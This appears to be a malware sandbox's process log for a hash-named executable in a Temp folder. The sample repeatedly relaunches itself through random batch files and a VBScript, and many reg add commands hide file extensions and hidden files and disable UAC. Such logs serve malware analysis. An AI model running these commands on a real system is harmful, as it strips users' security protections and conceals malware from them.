reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NUsocQYM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uQIYwEkI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FysEMUYk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IIEAIMEw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\REgEsAMI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VkgkocYM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KiEMcYMY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WgsIYMUM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AMkkEkIs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qEIUQUks.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ieQQMQgE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LUgMoQoI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EiMUkYgU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zMUIEIQM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CyYoEwgo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yWYQogks.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PCIEswMk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DmIscMAY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oUQUUYEg.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LIMEcUcA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

